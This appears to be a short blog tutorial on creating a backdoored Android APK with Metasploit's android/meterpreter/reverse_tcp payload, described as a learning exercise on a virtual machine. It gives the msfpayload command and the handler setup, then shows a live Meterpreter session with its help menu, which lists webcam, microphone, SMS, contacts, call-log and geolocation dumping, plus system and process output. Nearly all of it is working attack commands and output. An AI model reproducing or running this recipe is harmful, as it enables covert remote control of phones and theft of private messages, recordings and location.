Create a malicious apk file
Create a malicious apk file (backdoor.apk), and raw is our format to output.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apk
Install malicious apk file
For learning, I choose Android x86 Virtual Machine. Before apk is installed on the phone, we must set up a android meterpreter listener.
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadAndroid true yes Automatically load the Android extension
LHOST 192.168.1.108 yes The listen address
LPORT 4444 yes The listen port
RetryCount 10 yes Number of trials to be made if connection failed
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse handler on 192.168.1.108:4444
[*] Starting the payload handler...
[*] Sending stage (44648 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.108:41175) at 2015-02-23 16:56:32 +0000
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Android Commands
================
Command Description
------- -----------
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
Meterpreter : java/android
meterpreter > ps
Process List
============
PID Name Arch User
--- ---- ---- ----
1 /init root
2 kthreadd root
3 ksoftirqd/0 root
5 kworker/0:0H root
6 kworker/u2:0 root
7 migration/0 root
8 rcu_preempt root
9 rcu_bh root
10 rcu_sched root
11 watchdog/0 root
12 khelper root
295 writeback root
298 bioset root
299 crypto root
301 kblockd root
346 ata_sff root
353 khubd root
462 kworker/0:1 root
483 kswapd0 root
484 fsnotify_mark root
521 kworker/u2:2 root
660 scsi_eh_0 root
672 scsi_eh_1 root
675 scsi_eh_2 root
728 kworker/0:2 root
747 cfinteractive root
756 binder root
782 deferwq root
810 kworker/0:1H root
890 kpsmoused root
906 /sbin/v86d root
924 /sbin/ueventd root
1010 /system/bin/powerbtnd root
1011 /system/bin/sdcard media_rw
1014 /sbin/healthd root
1015 /system/bin/servicemanager system
1016 /system/bin/vold root
1017 /system/bin/netd root
1018 /system/bin/debuggerd root
1019 /system/bin/rild radio
1020 /system/bin/surfaceflinger root
1021 zygote root
1022 /system/bin/drmserver drm
1023 /system/bin/mediaserver media
1024 /system/bin/installd install
1025 /system/bin/keystore keystore
1026 /system/bin/sh root
1027 /system/bin/sh root
1040 /system/xbin/su root
1041 /sbin/adbd shell
1335 system_server system
1380 /system/bin/dhcpcd dhcp
1425 com.android.systemui u0_a11
1503 com.google.android.inputmethod.latin u0_a48
1517 com.google.android.gms u0_a8
1530 com.android.phone radio
1536 com.cyanogenmod.trebuchet u0_a19
1662 com.google.process.gapps u0_a8
1688 com.google.process.location u0_a8
1929 com.google.android.partnersetup u0_a10
2097 com.android.vending u0_a15
2129 com.thirdparty.superuser system
2143 com.google.android.googlequicksearchbox:search u0_a20
2220 com.android.deskclock u0_a34
2311 android.process.acore u0_a3
2663 com.android.packageinstaller u0_a58
2677 com.android.defcontainer u0_a4
2696 com.android.musicfx u0_a13
2716 com.google.android.apps.docs u0_a37
2736 com.android.gallery3d u0_a42
2757 com.svox.pico u0_a60
2825 android.process.media u0_a6
3361 com.android.settings system
3391 com.google.android.gms.drive u0_a8
3414 com.google.android.gms.wearable u0_a8
3441 com.android.keychain system
3457 com.android.documentsui u0_a36
3473 com.android.externalstorage u0_a7
3781 com.zmappsh u0_a75
3813 com.zmappsh:bdservice_v1 u0_a75
3930 jackpal.androidterm u0_a23
3944 /system/bin/sh u0_a23
4106 lysesoft.andftp u0_a79
4225 com.cyanogenmod.filemanager u0_a28
4240 /system/bin/sh u0_a28
4250 /system/bin/sh u0_a28
4324 com.metasploit.stage u0_a80
4372 wget root
4380 sh u0_a80
4381 ps u0_a80
Notices
When I install apk file on the phone (Tencent Security Software is installed.), it show me “App not installed“.
References:
[1].http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit
[2].https://community.rapid7.com/thread/4672